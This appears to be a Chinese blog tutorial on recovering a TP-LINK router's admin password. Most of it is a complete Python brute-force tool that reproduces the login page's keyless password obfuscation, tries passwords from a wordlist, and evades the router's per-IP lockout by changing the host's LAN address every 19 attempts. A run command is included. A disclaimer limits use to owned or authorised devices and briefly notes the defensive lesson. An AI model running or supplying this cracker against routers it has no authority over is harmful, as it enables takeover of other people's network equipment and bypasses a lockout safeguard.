找回TPLINK后台登录密码

找回TPLINK后台登录密码

TP-LINK 设备是日常生活中最常见的网络设备之一。有时我们需要找回自己路由器的后台登录密码,通常只能采用字典爆破。最初想着直接用 Burp Intruder 对登录请求做暴力破解,但抓包之后发现请求里的密码字段并不是明文,Intruder 无法直接替换原始密码,只能先弄清前端对密码做了什么处理。

注:本文仅供学习与安全研究,只能用于你本人拥有、或已获得书面授权测试的设备;坚决反对一切危害网络安全的行为,由此造成的法律后果自行负责!

先按照以往思路,抓包查看请求。

不难看到,密码字段在发送前已经被前端处理过(下文会看到,这只是一张固定替换表的混淆,并不是真正意义上的加密):

{"method":"do","login":{"password":"0wL8rbhc9TefbwK"}}

其中的「加密」方法来自登录页面的前端 JavaScript:它把密码与一段固定字符串逐字节异或,再用结果去查一张固定的 255 字符替换表。整个过程没有任何密钥、盐或随机数,任何人拿到页面脚本都能复现,因此只起到混淆作用,完全不能替代 HTTPS。

查阅了这位大佬的博客:https://blog.csdn.net/oMaFei/article/details/94592388 ,按照其中的分析用 Python 复现了这个编码并实现了模拟登录。路由器返回的 JSON 中 error_code 为 0 表示登录成功(响应里同时带有会话 stok);非 0 表示失败,其中 -1 在本文脚本中被当作「源 IP 已被封锁」的信号处理。

✈️解决IP被封

TP-LINK 对登录来源 IP 做了限制:同一 IP 错误 20 次后会被自动封锁。注意这个锁定是按来源 IP 计数、而不是按账号计数的,所以在同一局域网内,只要不断更换本机 IP 地址就能继续尝试。为了让破解顺利进行,脚本对一个 IP 只使用 19 次(不到 20 次),用完后立即切换到一个没有用过的 IP 地址。从防御角度看,这也正说明仅基于来源 IP 的登录锁定是不够的,应当配合按账号的失败计数或递增延时。

# Drop the address whose attempt budget is used up, then bring up a fresh one
# in the same /24 (root required; pick an address nothing else on the LAN uses).
sudo ip address delete 192.168.0.109/24 dev eth0
sudo ip address add 192.168.0.100/24 dev eth0

📧完整代码

#!/usr/bin/env python
# -*- coding:utf8 -*-
import json
import logging
import os
import random
import re
import subprocess
import sys
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from functools import partial

import requests

# Module-wide logging: timestamped, INFO and above, default (stderr) handler.
LOG_FORMAT = '%(asctime)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=LOG_FORMAT)
logger = logging.getLogger(__name__)

class NetworkManager:

def __init__(self, interface='eth0', gateway='192.168.0.1'):

self.interface = interface

self.gateway = gateway

self.used_ips = set()

self.current_ip_attempts = 0# 当前IP的尝试次数

self.max_attempts_per_ip = 19# 每个IP最多尝试次数

def get_current_ip(self):

"""获取当前IP地址"""

try:

result = subprocess.run(['ip', 'addr', 'show', self.interface],

capture_output=True, text=True)

ip_match = re.search(r'inet (\d+\.\d+\.\d+\.\d+)', result.stdout)

if ip_match:

return ip_match.group(1)

returnNone

except Exception as e:

logger.error(f"获取当前IP失败: {str(e)}")

returnNone

def generate_new_ip(self):

"""生成新的IP地址"""

whileTrue:

new_ip = f"192.168.0.{random.randint(2, 254)}"

if new_ip notin self.used_ips:

self.used_ips.add(new_ip)

return new_ip

def change_ip(self):

"""修改IP地址"""

new_ip = self.generate_new_ip()

logger.info(f"正在尝试切换到新IP: {new_ip}")

try:

current_ip = self.get_current_ip()

if current_ip:

# 删除当前IP

logger.info(f"删除当前IP {current_ip}...")

subprocess.run(['ip', 'addr', 'del', f"{current_ip}/24", 'dev', self.interface],

check=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

# 添加新IP

logger.info("正在添加新IP地址...")

subprocess.run(['ip', 'addr', 'add', f"{new_ip}/24", 'dev', self.interface],

check=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

# 等待网络连接生效

logger.info("等待网络连接生效...")

time.sleep(2)

# 验证IP是否更改成功

current_ip = self.get_current_ip()

if current_ip == new_ip:

logger.info(f"IP已成功更改为: {new_ip}")

self.current_ip_attempts = 0# 重置尝试次数

returnTrue

else:

logger.error(f"IP更改失败,当前IP: {current_ip}")

returnFalse

except subprocess.CalledProcessError as e:

logger.error(f"修改IP失败: {e.stderr.decode().strip()}")

returnFalse

except Exception as e:

logger.error(f"修改IP失败: {str(e)}")

returnFalse

def should_change_ip(self):

"""检查是否需要切换IP"""

self.current_ip_attempts += 1

if self.current_ip_attempts >= self.max_attempts_per_ip:

logger.info(f"当前IP已使用{self.current_ip_attempts}次,准备切换...")

returnTrue

returnFalse

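class LoginTpLink(object):
    """Drive the JSON login endpoint of an (older) TP-LINK web UI.

    The UI never sends the password in clear: its JavaScript maps it through a
    fixed XOR-and-lookup table (no secret involved), which encrypt_pwd()
    reproduces, and posts ``{"method":"do","login":{"password":...}}`` to the
    gateway.  ``error_code`` 0 in the reply means the password was accepted
    and ``stok`` is the session token; -1 is treated as "this source address
    is locked out" and triggers an address rotation.
    """

    def __init__(self, network_manager):
        self.stok = None            # session token from a successful reply
        self.success = False
        self.password = None        # the accepted password, if any
        self.network_manager = network_manager
        self.failed_attempts = 0
        self.max_failed_attempts = 15  # rotate before the router's 20-failure lockout
        # NOTE(review): try_password() builds a fresh instance per password, so
        # failed_attempts only ever reaches 1 there and NetworkManager's own
        # counter is what actually triggers rotation; kept for callers that
        # reuse one instance.
        self.max_ip_switch_retries = 3  # bounded retries instead of recursing

    def is_ip_blocked(self, response):
        """True if the reply is a JSON object with error_code == -1, else False.

        Non-JSON bodies are reported as not blocked; login() then fails the
        attempt on the parse error.
        """
        try:
            result = json.loads(response.text)
        except ValueError:
            return False
        return isinstance(result, dict) and result.get('error_code') == -1

    def _rotate_ip(self, reason):
        """Move to a fresh source address; on failure back off 60s and return False."""
        logger.warning(reason)
        if not self.network_manager.change_ip():
            logger.error("IP切换失败,等待60秒后重试...")
            time.sleep(60)
            return False
        self.failed_attempts = 0
        return True

    def login(self, password):
        """Try one password against the router.

        Returns True on success (password/stok are recorded on the instance),
        False when the router rejects it or the attempt could not be completed.
        When the source address is locked out it is rotated and the same
        password retried, up to max_ip_switch_retries failed rotations, instead
        of the candidate being silently dropped.  Never raises: errors are
        logged and reported as False so the worker pool keeps going.
        """
        encrypted = self.encrypt_pwd(password)
        # Target the gateway the NetworkManager was built for (was fixed to 192.168.0.1).
        url = f"http://{self.network_manager.gateway}/"
        headers = {
            'Content-Type': 'application/json; charset=UTF-8'
        }
        # encrypt_pwd() only emits characters from its fixed table, so no JSON
        # escaping is needed here.
        payload = '{"method":"do","login":{"password":"%s"}}' % encrypted
        rotations_failed = 0
        while True:
            if self.network_manager.should_change_ip():
                if not self._rotate_ip("当前IP使用次数已达上限,切换IP..."):
                    rotations_failed += 1
                    if rotations_failed > self.max_ip_switch_retries:
                        return False
                # Re-check the budget on whatever address we have now; a
                # successful rotation reset the counter, so this attempt is
                # counted against the new address.
                continue
            try:
                response = requests.post(url, data=payload, headers=headers, timeout=5)
            except Exception as e:  # per-task boundary: log, do not kill the worker
                logger.error(f"尝试密码 {password} 时发生错误: {str(e)}")
                return False
            if self.is_ip_blocked(response):
                if not self._rotate_ip("检测到IP被封,正在切换IP..."):
                    rotations_failed += 1
                    if rotations_failed > self.max_ip_switch_retries:
                        return False
                continue  # retry the same password from the new address
            try:
                result = json.loads(response.text)
            except ValueError as e:
                logger.error(f"尝试密码 {password} 时发生错误: {str(e)}")
                return False
            if isinstance(result, dict) and result.get('error_code') == 0:
                self.success = True
                self.password = password
                self.stok = result.get('stok')
                return True
            self.failed_attempts += 1
            if self.failed_attempts >= self.max_failed_attempts:
                # The router already answered for this password: rotate for the
                # next candidate rather than re-submitting this one (the old
                # code retried it, wasting an attempt on the new address).
                self._rotate_ip(f"失败次数达到{self.max_failed_attempts}次,切换IP...")
            return False

    def encrypt_pwd(self, password):
        """Reproduce the login page's password obfuscation.

        Output character i is ``dictionary[(cl ^ cr) % len(dictionary)]`` where
        cl/cr are the code points of the fixed string ``input1`` and of
        ``password`` at index i, with 187 (0xBB) standing in for whichever of
        the two is shorter.  The result has max(len(input1), len(password)),
        i.e. at least 15, characters, all drawn from ``dictionary``.

        This is keyless obfuscation, not encryption: anyone with the page's
        script can compute it.  The earlier port applied ``% len`` to the
        looked-up character instead of to the index, so an XOR of 255 raised
        IndexError on the 255-entry table (e.g. every 1-character password,
        since input1[1] is 'D' and 0x44 ^ 0xBB == 0xFF); the reference wraps
        to index 0 and so does this version.
        """
        input1 = "RDpbLfCPsJZ7fiv"
        dictionary = "yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW"
        len_dict = len(dictionary)
        len1 = len(input1)
        len2 = len(password)
        chars = []
        for index in range(max(len1, len2)):
            cl = ord(input1[index]) if index < len1 else 187
            cr = ord(password[index]) if index < len2 else 187
            chars.append(dictionary[(cl ^ cr) % len_dict])
        return ''.join(chars)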

def try_password(password, network_manager):
    """Try a single candidate; return it when the router accepts it, else None."""
    attempt = LoginTpLink(network_manager)
    if not attempt.login(password):
        return None
    logger.info(f"\n[+] 成功找到密码: {password}")
    return password

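def _restore_ip(network_manager, original_ip):
    """Best-effort: put the interface back on the address it had before we started.

    Failures are logged with the address so the operator can fix it by hand.
    """
    if not original_ip:
        return
    current_ip = network_manager.get_current_ip()
    if current_ip == original_ip:
        return
    try:
        if current_ip:
            subprocess.run(['ip', 'addr', 'del', f"{current_ip}/24", 'dev', network_manager.interface],
                           check=True, capture_output=True, text=True)
        subprocess.run(['ip', 'addr', 'add', f"{original_ip}/24", 'dev', network_manager.interface],
                       check=True, capture_output=True, text=True)
        logger.info(f"已恢复原IP: {original_ip}")
    except (subprocess.CalledProcessError, OSError) as e:
        logger.error(f"恢复原IP {original_ip} 失败,请手动处理: {str(e)}")


def main():
    """CLI entry: ``sudo python3 11.py <wordlist> [interface=eth0] [gateway=192.168.0.1]``.

    Loads one candidate per non-empty line of the wordlist, moves the host to a
    fresh source address, tries every candidate and restores the original
    address on the way out.  Exits 1 on a usage error, an unreadable wordlist,
    missing root privileges, or a failed initial address change.
    Only use this against a device you own or are authorised to test.
    """
    if not 2 <= len(sys.argv) <= 4:
        print("使用方法: sudo python 11.py <密码字典文件路径> [网卡名称=eth0] [网关=192.168.0.1]")
        sys.exit(1)
    password_file = sys.argv[1]
    interface = sys.argv[2] if len(sys.argv) > 2 else 'eth0'
    gateway = sys.argv[3] if len(sys.argv) > 3 else '192.168.0.1'

    # The ip(8) address changes need root; fail early with a clear message
    # instead of a CalledProcessError on the first rotation.
    if hasattr(os, 'geteuid') and os.geteuid() != 0:
        logger.error("需要root权限执行ip命令,请使用sudo运行")
        sys.exit(1)

    try:
        with open(password_file, 'r', encoding='utf-8') as f:
            passwords = [line.strip() for line in f if line.strip()]
    except (OSError, UnicodeDecodeError) as e:
        logger.error(f"读取密码字典文件时发生错误: {str(e)}")
        sys.exit(1)
    logger.info(f"[*] 已加载 {len(passwords)} 个密码")

    network_manager = NetworkManager(interface=interface, gateway=gateway)
    original_ip = network_manager.get_current_ip()  # restored when we are done
    logger.info("开始切换初始IP...")
    if not network_manager.change_ip():
        logger.error("初始IP切换失败,退出程序")
        sys.exit(1)

    logger.info("[*] 开始尝试破解...")
    try:
        # One worker: every address rotation removes the address the other
        # workers' in-flight requests are using, so with max_workers > 1 their
        # candidates come back as errors and are reported as failures.  Raise
        # this only if rotation is disabled.
        with ThreadPoolExecutor(max_workers=1) as executor:
            func = partial(try_password, network_manager=network_manager)
            results = list(executor.map(func, passwords))
    finally:
        _restore_ip(network_manager, original_ip)

    success_passwords = [p for p in results if p is not None]
    if success_passwords:
        logger.info(f"\n[+] 破解成功!找到 {len(success_passwords)} 个有效密码:")
        for pwd in success_passwords:
            logger.info(f" - {pwd}")
    else:
        logger.info("\n[-] 未找到有效密码")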

# Script entry point: only run the cracker when executed directly, not on import.
if __name__ == '__main__':
    sys.exit(main())

☢️使用方法

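# pass.txt is your wordlist. Root is required: the script rewrites the
# interface address with ip(8) and exits at "初始IP切换失败" otherwise.
sudo python3 11.py pass.txt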

注意:代码中路由器的网关 192.168.0.1 和网卡名称 eth0 都要按你的实际环境修改,脚本对新旧地址固定按 /24 掩码处理;切换 IP 需要 root 权限,所以必须用 sudo 运行。另外脚本运行后本机 IP 会被换成随机地址,结束后记得恢复。
